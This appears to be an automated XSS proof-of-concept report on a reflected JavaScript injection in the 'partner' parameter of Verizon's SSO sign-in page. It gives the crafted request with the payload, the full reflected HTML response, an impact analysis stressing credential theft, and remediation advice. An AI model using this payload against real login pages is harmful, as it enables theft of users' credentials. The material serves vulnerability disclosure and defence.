
XSS, Javascript Injection, Partner Parameter, signin.verizon.com

XSS Proof of Concept by XSS.Cx

XSS - Javascript Injection (Cross Site Scripting)
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/VOLPortalLogin

Issue detail

The value of the partner request parameter is copied, without escaping, into a JavaScript string literal delimited by double quotation marks. The payload ";alert(1)// was submitted inside an otherwise plausible value (hgtv80202";alert(1)//188) and was echoed unmodified in the application's response: the " closes the literal, the ; ends the statement, alert(1) runs, and // comments out the dangling "; so the script still parses. The same value is reflected into the var partner assignment and into each of the five s_837.detailpageName assignments in the Site Catalyst block, and also — unencoded — into the action attribute of the sign-in form and the hidden amLoginUrl input value, where the " terminates the attribute (a second, HTML-attribute-context injection; only the nested goto= copy of the parameter is percent-encoded).

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response and executed in the signin.verizon.com origin. The impact is higher than a generic reflected XSS because the affected page is the SSO sign-in form: script running here can read or replace the User ID and Password as they are typed and change where the form posts, so a crafted link is sufficient for credential theft. Nothing in the captured response mitigates this — it sets VZSSOCOM_SESSIONID without HttpOnly or Secure and sends no Content-Security-Policy header. Two caveats for reproduction: the script-context payload only fires if omnicode.js loads and defines s_837 (the reflecting block is wrapped in a typeof check), whereas the attribute-context reflection in the form action does not depend on that; and the var partner line shows the value with its digits removed (hgtv";alert(1)//) while the other reflections keep them, so whatever normalisation is applied there strips digits but not the quote, semicolon or slash characters. Remediation: validate partner server-side against the allow-list of known partner identifiers, and encode it for each output context it is written into (JavaScript-string escaping for the s_837 block, HTML-attribute encoding for the form action and hidden input).

Request 1

GET /sso/VOLPortalLogin?partner=hgtv80202"%3balert(1)%2f%2f188 HTTP/1.1
Host: signin.verizon.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 24 Feb 2016 03:08:24 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: VZSSOCOM_SESSIONID=xsscx; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20084









<!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge">
       <title>Verizon FiOS - sign in</title>
       <script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
       <meta name="description" content="">
       <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame -->
       <meta http-equiv="X-UA-Compatible" content="IE=edge">
       <meta name="viewport" content="width=device-width, initial-scale=1">

       <link href="/sso/resources/css/tvzipcode/vzrf.css" rel="stylesheet" />
       <link href="/sso/resources/css/tvzipcode/app.css" rel="stylesheet" />
       <!--[if IE 9]>
           <link href="/sso/resources/css/tvzipcode/vzrf-oldie2.css" rel="stylesheet" />
           <link href="/sso/resources/css/tvzipcode/vzrf-oldie3.css" rel="stylesheet" />
       <![endif]-->
       
       <!-- JavaScript plugins (requires jQuery) -->
       <script src="/sso/resources/js/tvonline/jquery.js"></script>
       <script type="text/javascript">
       function Validate() {
           var theUsername = document.tvlogin.IDToken1.value;
           var thePassword = document.tvlogin.IDToken2.value;
           var theZipcode;
           if(document.getElementById('zipcode-txt')) {
               theZipcode = document.tvlogin.zipcode.value;
           }
           
           // scLinkTrack('prop11=sso| tve| signin| signin^prop27=signin^prop37=sso| tve| signin');
           scLinkTrackID('signin');
           
           if(theUsername == '' || theUsername == null) {
        document.getElementById('IDToken1').focus();
               if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
               $("#IDToken2").removeClass("error");
        document.getElementById('uidAlert1').style.display='block';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
        return false;
        }
        else if(theUsername.length > 60) {
        document.getElementById('IDToken1').focus();
               if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
               $("#IDToken2").removeClass("error");
        document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='block';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
        }
           else if(!(/^[A-Za-z0-9_@'.+-]*$/.test(theUsername))) {
        document.getElementById('IDToken1').focus();
               if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
               $("#IDToken2").removeClass("error");
        document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='block';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(thePassword.length < 1) {
               document.getElementById('IDToken2').focus();
               if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
               $("#IDToken1").removeClass("error");
               document.getElementById('pwdAlert1').style.display='block';
           document.getElementById('pwdAlert2').style.display='none';
           document.getElementById('pwdAlert3').style.display='none';
        document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(thePassword.length < 6) {
               document.getElementById('IDToken2').focus();
               if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
               $("#IDToken1").removeClass("error");
               document.getElementById('pwdAlert1').style.display='none';
               document.getElementById('pwdAlert2').style.display='block';
           document.getElementById('pwdAlert3').style.display='none';
           document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(thePassword.length > 24) {
            document.getElementById('IDToken2').focus();
               if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
               $("#IDToken1").removeClass("error");
            document.getElementById('pwdAlert1').style.display='none';
           document.getElementById('pwdAlert2').style.display='none';
           document.getElementById('pwdAlert3').style.display='block';
           document.getElementById('uidAlert1').style.display='none';
           document.getElementById('uidAlert2').style.display='none';
           document.getElementById('uidAlert3').style.display='none';
           document.getElementById('loginAlert').style.display='none';
           if(document.getElementById('zipcode-txt')) {
                   document.getElementById('zipAlert').style.display='none';
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");    
               }
           return false;
           }
           else if(document.getElementById('zipcode-txt')) {
               if(theZipcode.length == 0 || theZipcode.length < 5 || !/(^\d{5}$)|(^\d{5}-\d{4}$)/.test(theZipcode)) {
                   if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").addClass("error");        
                   $("#IDToken1").removeClass("error");                    
                   $("#IDToken2").removeClass("error");
                   document.getElementById('zipcode-txt').focus();
                   document.getElementById('pwdAlert1').style.display='none';
                   document.getElementById('pwdAlert2').style.display='none';
                   document.getElementById('pwdAlert3').style.display='none';
                   document.getElementById('uidAlert1').style.display='none';
                   document.getElementById('uidAlert2').style.display='none';
                   document.getElementById('uidAlert3').style.display='none';
                   document.getElementById('loginAlert').style.display='none';
                   document.getElementById('zipAlert').style.display='block';                    
                   return false;
               }
           }
           
           //document.getElementById('tvloginsignin').click();
           document.tvlogin.submit();
           return false;
       }
       
       function putFocus() {
           
           if(document.getElementById('zipcode-txt')) {
               document.getElementById('zipcode-txt').focus();
           } else if(document.tvlogin != null){
               document.tvlogin.IDToken1.focus();
           }
           
       }
       
       function showInputError(errorMsg) {
           /*document.getElementById('userid').className='col-sm-5 col-lg-6 error';
           document.getElementById('passwd').className='col-sm-5 col-lg-6 error';*/
           document.getElementById('errormsgtxt').style.display='block';
           document.getElementById("errormsgtxt").innerHTML=errorMsg;
       }
               
       function ClickCancel() {
           scLinkTrackID('cancel');
           window.location='https://sp.auth.adobe.com/adobe-services/1.0/session?cancelled=1&_method=POST&mso_id=Verizon&redirect_url=http%3A%2F%2Fwatch.hgtv.com%2Factivate%2Fthanks.html%23Roku%26HGTV';
       }
       
       function clear_fields() {
           for( var n = 0; n < document.forms.length; n++ ) {
               for(var i = 0; i < document.forms[n].elements.length; i++) {
                   if( document.forms[n].elements[i].type == 'text') {
                       document.forms[n].elements[i].value = '';
                   }
                   if( document.forms[n].elements[i].type == 'password') {
                       document.forms[n].elements[i].value = '';
                   }
               }
           }
       }
       
       function NewCustomer() {
           scLinkTrackID('not vz ec');
           window.location='http://www.verizon.com/';
       }
       function RegisterUser() {
           scLinkTrackID('reg new acct');
           window.location='https://myverizonid.verizon.com/accessmanager/public/c/reg/start?choose=y&goto=https%3A%2F%2Fwww.verizon.com%2FForYourHome%2Fmyaccount%2Fngen%2Fpr%2Fhome%2Fmyverizon.aspx%3Freferrer%3Dregister';
       }
       function forgotSC() {
           scLinkTrackID('forgot un+pw');
       }
       function PrivacyPolicy() {
           scLinkTrackID('privacy');
           document.location.href='http://www.verizon.com/privacy/';
       }
       function OrderFios() {
           window.location='http://www.verizon.com/foryourhome/goflow/nationalbundles/bundlequalify.aspx';
       }
       function OrderPartner() {
           window.location='https://www.verizon.com/ForYourHome/GoFlow/MyVerizonnew/acslogin.aspx?FlowRoute=URC_UPGRADE&URCSOURCE=tve_generic';
       }
       
       $("#tvlogin").keypress(function(event) {
           if(event.which == 13){
               Validate();
           }
       });
       
       function activateChannel() {
           var xmlHttp;
           try
            {
            // Firefox, Opera 8.0+, Safari
            xmlHttp=new XMLHttpRequest();
            }
           catch (e)
            {
            // Internet Explorer
            try
            {
            xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
            }
            catch (e)
            {
            try
            {
            xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
            }
            catch (e)
            {
            alert("Your browser does not support AJAX!");

            }
            }
            }
            xmlHttp.onreadystatechange=function()
            {
            if(xmlHttp.readyState==4)
            {
                   //Submit the form to the TV Partner with SAML Response
                   $("form[name='cpsubmitter']").attr('method', 'post');
                   $("form[name='cpsubmitter']").attr('action', 'null');
               if("_top" == 'null') {
                   $("form[name='cpsubmitter']").attr('target', 'null');
               }
                   $("input[name='SAMLResponse']").val('null');
                   $("input[name='RelayState']").val('_00e50d14-1689-4eb7-b6f0-b40c58c6b19b');
                   $("input[name='targetValue']").val('null');
               $("form[name='cpsubmitter']").submit();
                }
            }
            xmlHttp.open("POST", "https://signin.verizon.com/sso/TVPActivationServlet?shadowisoc=null", true);
            xmlHttp.setRequestHeader('Content-Type','text/html');
            xmlHttp.send(null);
       }
       
       $("#tvactivation").keypress(function(event) {
           if(event.which == 13){
               activateChannel();
           }
       });
       </script>
       
   </head>
   <body onLoad="putFocus();">

       <!-- Start for Site Catalyst -->
       <script type="text/javascript">
           var s_account="verizontelecomglobal,verizontelecomsso";
       </script>
       <script language="javascript" src="//www.verizon.com/includes/javascript/omnicode.js"></script>
       <script type="text/javascript">
       if(typeof (s_837) != "undefined") {
           var error = "null";
           var partner = "hgtv";alert(1)//";
           if(error != null && error == "SAM"){
               s_837.simplepageName="tve| signin| error| incorrect uid pwd";
               s_837.detailpageName="tve| signin| error| incorrect uid pwd| hgtv80202";alert(1)//188";
           } else if(error != null && error == "NOTENTITLEDUSER"){
               s_837.simplepageName="tve| signin| error| notentitled";
               s_837.detailpageName="tve| signin| error| notentitled| hgtv80202";alert(1)//188";
           } else if(error != null && error == "NOTFiOSTVUSER"){
               s_837.simplepageName="tve| signin| error| notfios";
               s_837.detailpageName="tve| signin| error| notfios| hgtv80202";alert(1)//188";
           } else if(error != null && error == "MAINTENANCE"){
               s_837.simplepageName="tve| signin| error| maintenance";
               s_837.detailpageName="tve| signin| error| maintenance| hgtv80202";alert(1)//188";
           } else {
               s_837.simplepageName="tve| signin";
               s_837.detailpageName="tve| signin| hgtv80202";alert(1)//188";
           }
           s_837.pfxID="sso";
           s_837.prop2="res myverizon";
           s_837.prop3="tve sso";
           s_837.prop4="/vz/residential/myverizon/tve/sso";
           s_837.prop6="myverizon";
           s_837.prop40="res| sso iframe";
           s_837.prop48="tve";
           if(error != null && error != "" && error != "null") {
               s_837.events="event21";        
           } else {
               s_837.events="";
           }
       }
       </script>
       <script type="text/javascript" language="javascript">
           var s_code=s_837.t();if(s_code)document.write(s_code);
       </script>
       <!-- End for Site Catalyst -->

       <section>
           <main class="main
                       tiny-12 small-10 large-5
                       border-all border-grey-5 border-all-large
                       padding-top-small margin-top-small padding-bottom-tiny                
                   large-narrow">
               <!-- ## Header -->
               <div class="row">
                   <div class="tiny-12 large-6 columns">
                       <img src="/sso/resources/images/tvzipcode/vzlogo_med.png" alt="Verizon FiOS" title="Verizon FiOS" class="mw-medium tiny-12">
                   </div>
                   
               </div>

               <div class="row" style="display:block">
                   <div class="columns">
                   
                       <p class="text-large padding-top-small">Sign in with your Verizon Residential account info.</p>
                   
                   </div>
                   
                   <!-- Server login error messages -->
                   <div class="columns">
                   <div class="error-msg padding-top-small" id="loginAlert" >We're sorry, but either the User ID or Password entered is not correct. Please try again.</div>
                   </div>

                   <div class=" columns">
                       <!-- ## Form -->
                       <form data-parsley-validate="" novalidate name="tvlogin" method="post" autocomplete="off" action="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&goto=https://signin.verizon.com/sso/choice/tvpHandler.jsp?loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV&clientId=TvLogin&partner=hgtv80202";alert(1)//188&errorURL=https://signin.verizon.com/sso/VOLPortalLogin?src%3DSAM%26loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV">
                        <input type="hidden" name="cookiedomain" id="cookiedomain" value=".verizon.com" />
                        <input type="hidden" name="amLoginUrl" value="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&goto=https://signin.verizon.com/sso/choice/tvpHandler.jsp?loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV&clientId=TvLogin&partner=hgtv80202";alert(1)//188&errorURL=https://signin.verizon.com/sso/VOLPortalLogin?src%3DSAM%26loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV" />
                        <input type="hidden" name="stid" value="off" />
                        <input type="hidden" name="forceprofile" value="off" />
                        <input type="hidden" name="seclock" value="off" />
                        <input type="hidden" name="vzw" value ="off" >
                            <div class="row">
                               <div class="columns">
                                   

                                   <label for="IDToken1" class="hide-for-small-down">User ID</label>
                                   <input type="text" id="IDToken1" name="IDToken1" class="" autocomplete="off" placeholder="User ID" value="">
                                   <div class="error-msg" id="uidAlert1">Please enter your User ID</div>
                                   <div class="error-msg" id="uidAlert2">Username can not be longer than 60 characters</div>
                                   <div class="error-msg" id="uidAlert3">Please enter a User ID using letters, numbers or dots. Characters such as &, $, %, / or space may not be used.</div>

                                   <label for="IDToken2" class="hide-for-small-down">Password</label>
                                   <input type="Password" id="IDToken2" name="IDToken2" autocomplete="off" placeholder="Password">
                                   <div class="error-msg" id="pwdAlert1">Please enter your Password</div>
                                   <div class="error-msg" id="pwdAlert2">Password must contain at least 6 characters</div>
                                   <div class="error-msg" id="pwdAlert3">Password must contain less than 24 characters</div>
                                   
                                   <button id="tvloginsignin" class="button left signin" data-validate-form onClick="return Validate()">Sign In</button>
                                   <a href="https://signin.verizon.com/sso/forgotflows" class="forgotpwd" data-open-modal="ForgotUserOrPassword" onClick="forgotSC()">
                                   Forgot User ID or Password?
                                   </a>
                               </div><!-- .columns -->
                            </div><!-- .row -->
                       </form>
                       
                       <div class="row">
   <div class="columns">
       <a href="#" onClick="NewCustomer()">
       
                                   Not a Verizon Customer ?
                               
       </a> <br /> <br />
       <a href="#" onClick="RegisterUser()">
       
                                   Register a New Account
                               
                               </a> <br /> <br />
   </div>
</div>
                       
                       <!-- ## Big Buttons -->
                       <!-- div class="row">
                        <a href="#" class="text-white" onClick="NewCustomer()">
                           <div class="tiny-6 columns padding-right-zero">
                               <div class="panel theme-marketing">
                                   
                               </div>
                            </div>
                        </a>
                       </div-->

                       <!-- ## footer -->
                       &#64; 2016 Verizon
                       <a data-open-modal="PrivacyPolicy" href="javascript:void(0);" onClick="PrivacyPolicy()">Privacy Policy</a>
                   </div>
               </div>
               
               <!-- Channel Activation Section Starts -->
    <div class="row actcontent" style="display:none">
       
    </div>
               <!-- Channel Activation Section Ends -->
               <!-- Subscription Section Starts -->
               <div class="row subcontent" style="display:none">
                   
               </div>
               
           </main>
       </section>
       
   </body>
</html>

Proof of Concept - XSS executing in FF

FF PoC, Reflected XSS, Javascript Injection, signin.verizon.com, XSS.CX
Report generated by XSS.CX at Sat Mar 19 16:31:06 EDT 2016.